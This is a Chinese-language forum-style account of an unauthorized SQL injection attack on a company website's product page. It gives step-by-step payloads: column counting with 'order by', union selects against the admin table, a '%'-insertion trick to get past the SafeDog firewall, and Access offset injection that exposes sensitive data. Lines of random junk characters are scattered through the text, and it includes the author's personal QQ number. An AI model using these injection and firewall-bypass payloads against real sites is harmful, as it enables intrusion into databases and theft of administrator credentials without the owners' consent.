打开网站,一个企业站。
' E. O5 n9 Y! ?9 v0 W \! o
) G; B8 V$ n- L
, P" k3 m" q/ O5 l8 W' u( h: N顺手加个admin
- A& \5 g$ M6 D. [7 `4 n' ^. X* o' f" Y8 L" O6 T6 @
7 Z2 H* y+ E1 w
默认后台。
& x. c1 }; V3 b; n2 o; p回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。3 I# g5 k1 x1 x
/ G3 U( Z7 ]- h
& \; P% O9 E" W" p- w8 P5 ]: u7 b' |2 {7 X% |/ p. _
所以就不用御剑扫了,待会直接封IP。1 c# H* V3 ~$ M. u% I/ C7 `1 h2 M& S, P
2 T2 p) H9 G4 u. \6 z用order by语句判断是否存在注入。
% q4 U( ~ X4 n# Bhttp://www.xxx.com /product_show.asp?id=997 order by 1
" Q5 {% W8 c0 D$ C9 a" Hhttp://www.xxx.com /product_show.asp?id=997 order by 1000 q) g$ w& `' N) u7 v0 M
现在存在注入,经测试后发现是9个字段。8 b& h' I" d; O7 G ?8 I% C
* X3 t& F2 l/ h0 l1 B. g接下来进行联合查询,猜是否存在admin表。- F2 \: S g# M6 I
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。- e6 ]7 y4 ]& ] n L" F
1 [2 B( O& k, ]
+ R& J8 ^. \3 ^/ k: z+ K9 h( p; f8 W) F0 i. n1 P. n
在select中间加个%,se%lect绕过安全狗。
7 i4 S! W6 k% g$ E* R
9 [ o3 l+ \- l; I0 X: P% E+ G- x5 p: [/ s$ T( z& p' n
发现存在admin表,然后开始手工猜常用的字段。
) k1 L( W3 t. L$ R# j E- R纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。; ~8 o4 c" H5 b9 r
- u H0 \, Q! x( M/ A
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。0 ~" N/ J9 V4 r+ `- c1 b
/ y/ b4 v7 o( B
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
" E! p2 t2 j0 i" D, t0 m$ Lhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
5 J' c) m, T) t+ F5 v8 b好了,敏感内容出显了。0 M& C/ O& i) t) K0 F
G: E- o5 p' P
' V$ u" T9 s ~$ n# O$ L: [ b
6 }! g2 Z! W; ]9 ~. f, a- Q |